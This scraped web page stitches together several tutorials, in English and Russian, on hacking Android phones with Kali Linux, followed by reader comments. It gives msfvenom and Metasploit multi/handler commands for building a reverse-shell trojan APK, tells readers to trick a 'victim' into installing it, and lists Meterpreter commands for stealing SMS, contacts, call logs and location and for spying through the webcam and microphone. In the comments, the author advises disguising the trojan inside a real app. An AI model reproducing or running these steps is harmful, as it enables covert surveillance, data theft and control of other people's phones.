Android hacks kali linux

Hack Android Mobile Through Kali Linux.

I will tell you how you can hack and control any Android phone. android hacks

Kali Linux – Hack Android Mobile

First of all, you have to open the terminal of your Kali Linux.

After opening the terminal, you have to create a virus for which the command is given above the command section and is also shown in the photo. With this virus, you can control any phone in your local network.

Kali Linux – Create Payload.

After pasting the above commands, you have to enter the IP of your Linux in the localhost, after that, you have to enter the port number in lport section and then at the last, you have to give the name of this virus which should be in (.apk) format. Have to press enter.

To see your IP, you have to type ifconfig in the terminal and then copy your IP as shown in the photo.

After this, you can see that my virus has been created, which has been shown in the photo, whose size has also been mentioned. After this, to control the virus, you have to open a tool named msfconsole

in your Linux, for which you have to type msfconsole in the terminal and press enter.

After opening the tool, some such screen will open in front of you. From where you can control your virus.

Kali Linux – Fill The Payload Information.

To control your virus, you have to type some commands which are given in the comment section above. And shown in the photo as well. With this command, your (multi handler) will start.

After this, you have to set your payload which you gave while creating the virus. With which you will be able to control your virus.

After all this process you have to enter the IP of your localhost and then enter the port that you

gave while creating the virus. And then you have to press enter and write exploit so that your payload will start.

Kali Linux – Installing the Apk file In Phone.

Now you have to install your virus in the phone you want to control, for which first you have to put that virus in the phone, for which you can also use your Linux’s Apache service.

To use the Apache service, you have to start the services, whose command is given above and is also shown in the photo.

After this, you have to download your virus from the server and install it inside the phone. After installing, you have to open the virus one and two times.

Kali Linux – Use the Victims Phone.

You can see that my phone is now connected with Linux and our virus is working, here we have got a meterpreter session through which we can see and download anything from the phone. You can see that I had clicked on the virus two times, due to which my two sessions have opened.

Now you can take anything from the phone if you want to use it so type in your terminal (?) You can read its help by writing. Where you will learn to use all things. Hack Android Mobile. android hacks

Источник

Exploit Android Using Kali Linux

Last Updated on May 20, 2021 by Walid Salame 24 Comments

This is a tutorial explaining how to hack android phones with Kali Linux

Читайте также:  Windows zver для flash

Step 1: Fire-Up Kali:
Open a terminal, and make a Trojan .apk You can do this by typing :

LHOST=192.168.0.112 ( Change the IP with your own IP address ) To find your own IP type in terminal

LPORT=6227 ( you can chose any port you want but make sure it’s not used )
You can also hack android on WAN i.e. through Internet by using your Public/External IP in the LHOST and by port forwarding

Step 2: Open Another Terminal:
Open another terminal while the apk file is being produced.
start metasploit console, by typing :

Step 3: Set-Up a Listener:

After it loads(it will take some time), load the multi-handler exploit by typing :

Set up a (reverse) payload by typing :

To set L host & L Port type :

(Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!
to start the listener type:

Copy the application that you made (adri.apk) from the root folder to you android phone.
or send it to the victim using Uploading services like Dropbox or any sharing website you may like.
Let the Victim install the andri app(as he would think it is meant to upgrade some features on his phone)
However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
And when the victim install your app >>>

Step 5: have fun !
Type help to get a list of the available commend :

and lets say we typed webcam_stream
There comes the Meterpreter prompt:

here is a list of all the commands

[tab]
[content title=”File system”]
Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
[/content]
[content title=”Networking”]
Command Description
——- ———–
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
[/content]
[content title=”System”]
Command Description
——- ———–
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system’s local date and time
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
[/content]
[content title=”Webcam”]
Command Description
——- ———–
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam

Comments

how to bind upgrader.apk to a real application. So that when the user downloads the app, it seems like a real app and thus does not create any doubt in the user mind?

Walid Salame says

for that you need to decompress the real app apk file and add your own codes for spying and make the new apk look like an upgrade …
you what you really need is android programming

Walid Salame says

Hello bro thanks for this tutorial but i need help please can u help me this was a great post now my problem is that now i know how to control my phone as per this post but the thing is now i want to know how to control my phone when it is using other network like my phone sim data .. Network so how should i do it please bro can u make a new tutorial explaining this perfectly i mean explaining how to control android when it is on other network please it is my request to u

Читайте также:  How to update microsoft windows update

il faut sur tu utilise ngrok

Walid Salame says

i will try to make a tutorial for that … need sometime

Hi Bro,
I created exploit file on kali linux 2016.1
And then send it through sharing websites then I installed it on my android phone and I didn’t get meterpreter ccommand . I can show u that problems by connecting to u r pC using team viewer.

I appreciate ur answers ihave tried this
for over 5m on the tried and failed tried and failed then I Google but nothing I found

why you set 2 different payload at the first you set up for android and the second is for windows ?

Walid Salame says

your phone and your computer must be in the same network . or you need to use a public IP for your computer

hi brother please tell me how to attach and join the apk with a photo or video or any website in order to send it to my android as photo for exemple; thank for your answer

hi brother;wanna know please how to How to join and attach the apk with a photo or video or siteweb in order to send it to my android

As i like this article.Thanks for sharing it.I am quit basic in this.but what or which app we send to the victim so that we can gather info for our listener port.

hi. thanks for this tutorial. why does not install on android phone?

Utsav Patel says

everything is fine at last ..my apk is blind with msf…all set but when i enter dump_callog or anyother command it give me a error operation failed 1
plz help me.

Walid Salame says

make sure to let your phone install app from unknown source

Walid Salame says

The apk file we made !

got the same error and coudnt find any soloution

I tried to run this, but it was error (2020.1)

meterpreter> webcam_snap
[*] Starting …
[*] Stopped
[-] webcam_start: Operation failed: 1

Hi brothers
I managed to create the application and even install on the target phone but the meterpreter session does not open. Thank you for your reply.

what you get when you try to open meterpreter session ?

hy bro. i have a probleme and i hope u fix this for me.when i put the file apk in the first time. i must put my file apk that i have

I’m sorry i didn’t really understand what you mean

Источник

Краткое руководство: Как взломать андроид с Kali Linux

Главное меню » Операционная система Linux » Краткое руководство: Как взломать андроид с Kali Linux

Предпосылки для взлома Android

  1. Kali Linux
  2. Android телефон: Для демонстрационных целей использовался Android emulator предоставленный Google.

Шаги для взлома Android

1. Создать Payload

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

с. Проверьте apk, созданный с помощью jarsigner.

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

Теперь позвольте оптимизировать apk.

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

Читайте также:  Linux просмотр входящего трафика

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Источник

How To Hack Android Phones Using Kali Linux 2019

H acking of Android phone sounds like very odd, but here our expert trainers give you the best tutorials to hack android phone using Kali Linux. Android phones have a significant share in smartphone market. So targeting Android phone is very good option to hack them quickly. In this complete tutorial on Android hacking, i’ll show you merits and de-merits of Android hacking. So let’s start Hack Android Phones Using Kali Linux.

How To Hack Android Phones Using Kali Linux 2019

Before going to learn how to hack android. I must want to tell about Kali Linux through which these hacks works.

Warning:- This Hack is to aware you, and learn this only for Educational Purpose. and Don’t try to do any illegal activity.

About Kali Linux?

Kali Linux is a “Debian-derived Linux distribution designed for digital forensics and penetration testing.” There are lots of functions in Kali Linux like Penetration Testing and Ethical Hacking Linux Distribution etc.

Requirement:

1. Kali Linux installed.
2. An Android phone.
3. Sharp Brain

Note: In This tutorial here i’m using Acer Laptop as Attacker PC in which Kali linux is installed, and Coolpad Note 3 Android phone as Victim’s Android phone to show you how this actually works.

Steps: How To Hack Android Phones Using Kali Linux.

#1.Open Kali terminal on your PC.

#2.We will be going to use “MSFVENOM” to create a malicious apk file that we will install on the android phone.

#3.Paste these given commands in terminal.

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/itechhacks.apk

#4. Change the “LHOST” to you local IP address and press enter.

#5. Now open the root folder and send the techhacks.apk to the victim. (As shown in pictures)

#6. Open a new terminal and enter “msfconsole.”

#7. After opening Metasploit console type these following commands which are used to create payload handler which will create a connection between the victim and Kali PC.

use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit

#8. Change the LHOST to your local IP address. Also, don’t close this terminal.

#9. Wait until victim opens the file.

#10. After the victim opens the file, you will get a interpreter session. Now open the MSF console terminal and use session -i 1command to access the session.

#11. In the meterpreter session, you can use various commands that are given below to play different types of tricks on the victim phone like capturing a photo, screenshot, call logs,SMS logs, sending an SMS.

Command Description
——- ———–
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information

Note:

*. Don’t close the msfconsole terminal.
*. This is only for educational purpose.

Источник

Оцените статью